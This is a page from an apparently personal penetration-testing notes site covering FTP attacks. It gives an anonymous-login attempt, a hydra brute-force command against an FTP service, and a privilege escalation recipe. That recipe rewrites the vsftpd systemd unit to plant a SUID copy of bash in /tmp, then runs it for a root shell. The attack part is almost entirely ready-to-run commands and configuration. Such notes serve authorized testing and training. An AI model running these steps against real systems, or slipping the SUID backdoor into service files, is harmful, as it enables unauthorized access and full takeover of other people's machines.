TurboWindX
  • Welcome
  • Hacking Methodologies
    • Known Tools & Technologies
    • Kill Chain
    • Phyisical and hardware
      • Full Screen Escape
  • Checklist - WebApps
  • Checklist - Windows
  • External Recon
    • Ports & services scanning
    • Web Recon
      • CMS
        • Wordpress
      • Path traversal & LFI/RFI
      • XSS - Cross site scripting
      • XML External Entity - XXE
  • Internal Recon
    • Active Directory
  • Post Exploitation
    • Container/Sandbox Breakout
    • Privilege Escalation
      • Hashing & Cracking
    • Persistence
      • Windows
    • Data Exfiltration
      • Steganography
      • Pivot & Tunneling
  • Shells
  • Protocols
    • FTP
    • SSH
    • DNS
    • IPP
  • Binary Exploitation
    • Linux - Simple reverse & crack
  • Memory Analysis
  • Forensics
  • Android & iOS
  • Database Injection & Exploitation
  • DDoS
  • Kubernetes & Docker
  • Phish
Powered by GitBook
On this page
  • Anonymous Login
  • Brute Force
  • Privilege Escalation - VSFTPD

Was this helpful?

  1. Protocols

FTP

Anonymous Login

Some installations of FTP will allow anonymous logins.

ftp <victim_ip> 
anonymous:anonymous

Brute Force

If no max attempts or any similar system is in place, simply brute force it.

hydra -l admin -P wordlist.txt victim_ip -t 64 ftp

Privilege Escalation - VSFTPD

If you can edit the vsftpd service file. You can get a root shell

Modify the service file to run the following commands:

cp /bin/bash /tmp/root_shell
chmod +xs /tmp/root_shell

These commands copy the /bin/bash to /tmp/root_shell and set the SUID bit on it, which would allow us to execute the binary as the owner i.e. root

Edit the /lib/systemd/system/vsftpd.service file to contain the following code:

[Unit]
Description=vsftpd FTP server
After=network.target

[Service]
Type=simple
User=root
ExecStart=/bin/bash -c 'cp /bin/bash /tmp/root_shell; chmod +xs /tmp/root_shell'
#ExecReload=/bin/kill -HUP $MAINPID
#ExecStartPre=-/bin/mkdir -p /var/run/vsftpd/empty

[Install]
WantedBy=multi-user.target

Once the vsftpd.service file was modified, reload the daemon:

systemctl daemon-reload

This allowed us to run our modified service using

sudo /usr/sbin/service vsftpd restart

New file root_shell should now be available inside the /tmp directory

Use file to spawn a root shell.

/tmp/root_shell -p
PreviousProtocolsNextSSH

Last updated 3 years ago

Was this helpful?